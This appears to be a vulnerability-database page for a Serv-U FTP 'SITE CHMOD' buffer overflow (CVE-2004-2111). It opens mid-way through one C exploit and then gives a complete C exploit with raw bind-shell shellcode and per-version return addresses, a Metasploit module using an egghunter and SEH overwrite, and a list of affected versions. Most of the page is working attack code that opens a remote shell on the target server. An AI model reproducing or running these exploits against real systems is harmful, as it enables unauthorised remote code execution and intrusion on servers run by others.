sprintf(buf, "PASS %s\r\n", argv[4]);
send(ftpsock, buf, strlen(buf), 0);
ret = recv(ftpsock, recv_buf, sizeof(recv_buf), 0);
recv_buf[ret] = 0;
printf("%s", recv_buf);
sprintf(buf, "CWD %s\r\n", argv[5]);
send(ftpsock, buf, strlen(buf), 0);
ret = recv(ftpsock, recv_buf, sizeof(recv_buf), 0);
recv_buf[ret] = 0;
printf("%s", recv_buf);
memset(evil_chmod, 0x90, sizeof(evil_chmod));
memcpy(evil_chmod, CHMOD_CMD, strlen(CHMOD_CMD));
memcpy(&evil_chmod[strlen(CHMOD_CMD)+PADDING_SIZE], seh, strlen(seh));
memcpy(&evil_chmod[strlen(CHMOD_CMD)+PADDING_SIZE+strlen(seh)+20],
bdshellcode, strlen(bdshellcode));
send(ftpsock, evil_chmod, strlen(evil_chmod), 0);
printf("[+] Shellcode sent\n");
printf("[+] Now nc to port 53\n");
closesocket(ftpsock);
WSACleanup();
return 0;
}
int connect_tcp(char *host, int port)
{
struct hostent *rhost;
struct sockaddr_in sin_rhost;
unsigned long ip_rhost;
int sock;
memset(&sin_rhost, 0, sizeof(sin_rhost));
sin_rhost.sin_family = AF_INET;
sin_rhost.sin_port = htons(port);
ip_rhost = inet_addr(host);
if(ip_rhost==INADDR_NONE) {
rhost = gethostbyname(host);
if(rhost==0) return -1;
ip_rhost = *(unsigned long*)rhost->h_addr;
}
sin_rhost.sin_addr.s_addr = ip_rhost;
sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if(sock<0) {
return -1;
}
if(connect(sock, (struct sockaddr*) &sin_rhost, sizeof(sin_rhost))) {
return -1;
}
return sock;
}
Exploit Database EDB-ID : 822
Publication date : 2004-01-29 23h00 +00:00
Author : Skylined
EDB Verified : Yes
#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#define exploit_length 511
#define NOP 'A'
#define SEH_handler_offset 400
char* SEH_handler = "\x41\x41\xEB\x04"; // 3) jmp over next four bytes
char* retaddress_4004 = "\xab\x1c\x5f\x01"; // 1) libeay32.015f1cab
char* retaddress_4100 = "\xcb\x1c\x41\x01"; // 1) ssleay32.01411ccb
char* retaddress_4103 = "\x8b\x1d\x41\x01"; // 1) ssleay32.01411d8b
char* shellcode =
"\xeb\x43\x56\x57\x8b\x45\x3c\x8b\x54\x05\x78\x01\xea\x52\x8b\x52"
"\x20\x01\xea\x31\xc0\x31\xc9\x41\x8b\x34\x8a\x01\xee\x31\xff\xc1"
"\xcf\x13\xac\x01\xc7\x85\xc0\x75\xf6\x39\xdf\x75\xea\x5a\x8b\x5a"
"\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01"
"\xe8\x5f\x5e\xff\xe0\xfc\x31\xc0\x64\x8b\x40\x30\x8b\x40\x0c\x8b"
"\x70\x1c\xad\x8b\x68\x08\x31\xc0\x66\xb8\x6c\x6c\x50\x68\x33\x32"
"\x2e\x64\x68\x77\x73\x32\x5f\x54\xbb\x71\xa7\xe8\xfe\xe8\x90\xff"
"\xff\xff\x89\xef\x89\xc5\x81\xc4\x70\xfe\xff\xff\x54\x31\xc0\xfe"
"\xc4\x40\x50\xbb\x22\x7d\xab\x7d\xe8\x75\xff\xff\xff\x31\xc0\x50"
"\x50\x50\x50\x40\x50\x40\x50\xbb\xa6\x55\x34\x79\xe8\x61\xff\xff"
"\xff\x89\xc6\x31\xc0\x50\x50\x35\x02\x01\x70\xcc\xfe\xcc\x50\x89"
"\xe0\x50\x6a\x10\x50\x56\xbb\x81\xb4\x2c\xbe\xe8\x42\xff\xff\xff"
"\x31\xc0\x50\x56\xbb\xd3\xfa\x58\x9b\xe8\x34\xff\xff\xff\x58\x6a"
"\x10\x54\x50\x56\xbb\x47\xf3\x56\xc6\xe8\x24\xff\xff\xff\x31\xdb"
"\x53\x68\x2e\x63\x6d\x64\x89\xe1\x41\x50\x50\x50\x53\x53\x31\xc0"
"\xfe\xc4\x40\x50\x53\x53\x53\x53\x53\x53\x53\x53\x53\x53\x6a\x44"
"\x89\xe6\x50\x55\x53\x53\x53\x53\x54\x56\x53\x53\x53\x43\x53\x4b"
"\x53\x53\x51\x53\x89\xfd\xbb\x21\xd0\x05\xd0\xe8\xe2\xfe\xff\xff"
"\x31\xc0\x48\x8b\x44\x24\x04\xbb\x43\xcb\x8d\x5f\xe8\xd1\xfe\xff"
"\xff\x5d\x5d\x5d\xbb\x12\x6b\x6d\xd0\xe8\xc4\xfe\xff\xff\x31\xc0"
"\x50\x89\xfd\xbb\x69\x1d\x42\x3a\xe8\xb5\xfe\xff\xff";
int sock;
FILE* FILEsock;
int doubling;
void send_command(char *command, char *arguments) {
int i;
send(sock, command, strlen(command), 0);
send(sock, " ", 1, 0);
for (i=0; i<strlen(arguments); i++) {
send(sock, arguments+i, 1, 0);
if (doubling && arguments[i] == '\xff') send(sock, arguments+i, 1, 0);
}
send(sock, "\x0a\x0d", 2, 0);
}
int main(int argc, char *argv[], char *envp[]) {
struct sockaddr_in addr;
char *outbuffer, inbuffer[256];
char *retaddress = NULL;
char *version = NULL;
if (argc<5) {
printf("Usage: %s IP PORT USERNAME PASSWORD [DIRECTORY]\n", argv[0]);
exit(-1);
}
printf("- Serv-ME ----------------------------------------------------\n"
" Serv-U v4.x \"site chmod\" exploit.\n"
" Written by SkyLined <SkyLined@EduP.TUDelft.nl>.\n"
" Credits for the vulnerability go to ICBM <icbm@0x557.net>.\n"
" Thanks to H D Moore for the shellcode (www.metasploit.com).\n"
" Greets to everyone at 0dd and #netric.\n"
" (K)(L)(F) for Suzan.\n"
"\n"
" Binds a shell at %s:28876 if successfull.\n"
" Tested with: v4.0.0.4, v4.1.0.0, v4.1.0.3 on W2K-EN.\n"
"--------------------------------------------------------------\n",
argv[1]);
addr.sin_family = AF_INET;
addr.sin_port = htons(atoi(argv[2]));
addr.sin_addr.s_addr = inet_addr(argv[1]);
printf("\n[+] Connecting to %s:%s...\n", argv[1], argv[2]);
if ((sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) {
perror("Socket creation failed");
exit(-1);
}
if (connect(sock, (struct sockaddr *)&addr, sizeof addr) == -1) {
perror("Connection failed");
exit(-1);
}
FILEsock = fdopen(sock, "r");
printf(" --> %s", fgets(inbuffer, sizeof inbuffer, FILEsock));
if (strstr(inbuffer, "220 Serv-U FTP Server v4.") != inbuffer) {
printf("[-] This is not a Serv-U v4.X ftp server.\n");
exit(-1);
}
if (strstr(inbuffer, "v4.1") > 0) {
retaddress = retaddress_4103;
version = "4.1.0.3";
}
printf("\n[+] Login in as %s:%s...\n", argv[3], argv[4]);
send_command("USER", argv[3]);
printf(" --> %s", fgets(inbuffer, sizeof inbuffer, FILEsock));
send_command("PASS", argv[4]);
printf(" --> %s", fgets(inbuffer, sizeof inbuffer, FILEsock));
if (strstr(inbuffer, "230") != inbuffer) {
printf("[-] Login failed.\n");
exit(-1);
}
if (argv[5]) {
printf("\n[+] Changing directory...\n");
send_command("CD", argv[5]);
printf(" --> %s", fgets(inbuffer, sizeof inbuffer, FILEsock));
}
outbuffer = (char*) malloc(exploit_length + strlen(shellcode));
memset(outbuffer, NOP, exploit_length);
memcpy(outbuffer+exploit_length, shellcode, strlen(shellcode));
printf("\n[+] Checking if \\xff doubling is nescesary: ");
send_command("SITE CHMOD 477", "-\xff\xff-");
fgets(inbuffer, sizeof inbuffer, FILEsock);
if (strchr(inbuffer, '\xff') == strrchr(inbuffer, '\xff')) {
doubling = 1;
printf("Yes.");
retaddress = retaddress_4004;
version = "4.0.0.4";
} else {
printf("No.");
if (retaddress==NULL) {
retaddress = retaddress_4100;
version = "4.1.0.0";
}
}
printf("\n[+] Serv-U FTP server version %s: using retaddress 0x%08x",
version, *(int*)retaddress);
memcpy(outbuffer + SEH_handler_offset, SEH_handler, strlen(SEH_handler));
memcpy(outbuffer + SEH_handler_offset + 4, retaddress, strlen(retaddress));
printf("\n[+] Sending exploit... ");
send_command("SITE CHMOD 477", outbuffer);
printf("send, you can now try to connect to %s:28876.\n", argv[1]);
printf(" --> %s", fgets(inbuffer, sizeof inbuffer, FILEsock));
close(socket);
printf("\n[+] Done. \n");
}
// milw0rm.com [2004-01-30]
Exploit Database EDB-ID : 18190
Publication date : 2011-12-01 23h00 +00:00
Author : Metasploit
EDB Verified : Yes
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::Egghunter
include Msf::Exploit::Remote::Ftp
def initialize(info = {})
super(update_info(info,
'Name' => 'Serv-U FTP Server <4.2 Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in the site chmod command
in versions of Serv-U FTP Server prior to 4.2.
You must have valid credentials to trigger this vulnerability. Exploitation
also leaves the service in a non-functional state.
},
'Author' => 'thelightcosine <thelightcosine[at]metasploit.com>',
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
[ 'CVE', '2004-2111'],
[ 'BID', '9483'],
],
'Privileged' => true,
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Payload' =>
{
'BadChars' => "\x00\x7e\x2b\x26\x3d\x25\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e",
'DisableNops' => true,
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows 2000 SP0-4 EN', {
'Ret' => 0x750212bc, #WS2HELP.DLL
'Offset' => 396 } ],
[ 'Windows XP SP0-1 EN', {
'Ret' => 0x71aa388f, #WS2HELP.DLL
'Offset' => 394 } ]
],
'DisclosureDate' => 'Dec 31 2004',
'DefaultTarget' => 0))
end
def check
connect
disconnect
if (banner =~ /Serv-U FTP Server v((4.(0|1))|3.\d)/)
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
end
def exploit
connect_login
eggoptions =
{
:checksum => true,
:eggtag => "W00T"
}
hunter,egg = generate_egghunter(payload.encoded,payload_badchars,eggoptions)
buffer = "chmod 777 "
buffer << make_nops(target['Offset'] - egg.length - hunter.length)
buffer << egg
buffer << hunter
buffer << "\xeb\xc9\x41\x41" #nseh, jump back to egghunter
buffer << [target.ret].pack('V') #seh
buffer << rand_text(5000)
print_status("Trying target #{target.name}...")
send_cmd( ['SITE', buffer] , false)
handler
disconnect
end
end
Products Mentioned
Configuraton 0
Solarwinds>>Serv-u_file_server >> Version To (including) 4.1.0.3
- Solarwinds>>Serv-u_file_server >> Version 3.0.0.16 (Open CPE detail)
- Solarwinds>>Serv-u_file_server >> Version 3.0.0.17 (Open CPE detail)
- Solarwinds>>Serv-u_file_server >> Version 3.1.0.0 (Open CPE detail)
- Solarwinds>>Serv-u_file_server >> Version 3.1.0.1 (Open CPE detail)
- Solarwinds>>Serv-u_file_server >> Version 3.1.0.3 (Open CPE detail)
- Solarwinds>>Serv-u_file_server >> Version 4.0.0.4 (Open CPE detail)
- Solarwinds>>Serv-u_file_server >> Version 4.1.0.0 (Open CPE detail)
- Solarwinds>>Serv-u_file_server >> Version 4.1.0.3 (Open CPE detail)
Solarwinds>>Serv-u_file_server >> Version 3.0.0.16
- Solarwinds>>Serv-u_file_server >> Version 3.0.0.16 (Open CPE detail)
Solarwinds>>Serv-u_file_server >> Version 3.0.0.17
- Solarwinds>>Serv-u_file_server >> Version 3.0.0.17 (Open CPE detail)
Solarwinds>>Serv-u_file_server >> Version 3.1.0.0
- Solarwinds>>Serv-u_file_server >> Version 3.1.0.0 (Open CPE detail)
Solarwinds>>Serv-u_file_server >> Version 3.1.0.1
- Solarwinds>>Serv-u_file_server >> Version 3.1.0.1 (Open CPE detail)
Solarwinds>>Serv-u_file_server >> Version 3.1.0.3
- Solarwinds>>Serv-u_file_server >> Version 3.1.0.3 (Open CPE detail)
Solarwinds>>Serv-u_file_server >> Version 4.0.0.4
- Solarwinds>>Serv-u_file_server >> Version 4.0.0.4 (Open CPE detail)
Solarwinds>>Serv-u_file_server >> Version 4.1.0.0
- Solarwinds>>Serv-u_file_server >> Version 4.1.0.0 (Open CPE detail)
References
http://archives.neohapsis.com/archives/bugtraq/2004-01/0249.html
Tags : mailing-list, x_refsource_BUGTRAQ
Tags : mailing-list, x_refsource_BUGTRAQ
